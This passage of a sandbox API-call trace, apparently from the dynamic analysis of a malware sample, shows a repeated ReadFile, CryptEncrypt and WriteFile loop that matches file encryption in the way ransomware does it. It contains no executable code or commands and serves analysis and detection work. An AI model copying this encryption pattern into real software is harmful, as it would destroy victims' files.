hFile=0x5d4c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.919] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.919] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.919] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.919] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.919] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.919] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.919] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.919] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.919] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.919] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.919] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.919] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.919] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.920] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.920] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.920] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.920] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.920] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.920] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.920] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.920] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.920] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.920] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.920] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.920] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.921] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.921] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.921] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.921] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.921] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.921] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.921] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.921] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.921] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.921] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.922] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.922] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.923] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.923] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.923] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.923] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.923] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.923] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.923] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.923] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.923] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.923] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.923] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.923] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.923] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.924] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.924] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.924] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.924] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.924] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.924] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.924] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.924] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.924] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.924] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.924] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.924] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.925] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.925] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.925] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.925] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.925] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.925] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.925] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.925] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.925] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.925] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.925] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.925] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.926] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.926] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.926] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.926] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.926] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.926] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.926] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.926] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.926] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.926] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.926] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.927] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.927] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.927] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.927] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.927] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.927] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.927] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.927] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.927] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0281.927] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.927] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0281.927] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, 